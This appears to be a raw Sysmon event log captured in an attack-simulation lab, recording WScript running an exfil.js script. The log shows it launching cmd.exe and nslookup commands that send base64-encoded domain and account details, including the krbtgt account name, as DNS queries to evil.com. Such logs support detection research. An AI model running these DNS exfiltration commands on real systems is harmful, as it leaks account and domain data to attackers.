(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmtk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.828{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhic.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.796{2E1864BB-18EB-629A-A343-000000005F02}31407456C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-A443-000000005F02}5772C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.796{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.796{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.796{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.796{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.796{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A443-000000005F02}5772C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.796{2E1864BB-18EB-629A-A243-000000005F02}20207772C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-A443-000000005F02}5772C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.805{2E1864BB-18EB-629A-A443-000000005F02}5772C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-A243-000000005F02}2020C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhic.tmp 2>&1 10341000x8000000000000000208958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.781{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-A343-000000005F02}3140C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.781{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-A343-000000005F02}3140C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.778{2E1864BB-18EB-629A-A343-000000005F02}31407456C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-A243-000000005F02}2020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.758{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A343-000000005F02}3140C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.758{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.758{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A243-000000005F02}2020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.758{2E1864BB-18E0-629A-6742-000000005F02}39761848C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-A243-000000005F02}2020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.758{2E1864BB-18EB-629A-A243-000000005F02}2020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhic.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.743{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlaio.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.727{2E1864BB-18EB-629A-A043-000000005F02}77844232C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-A143-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.712{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-A143-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.712{2E1864BB-18EB-629A-9F43-000000005F02}77968096C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-A143-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.724{2E1864BB-18EB-629A-A143-000000005F02}8104C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-9F43-000000005F02}7796C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaio.tmp 2>&1 10341000x8000000000000000208938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.696{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-A043-000000005F02}7784C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.696{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-A043-000000005F02}7784C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 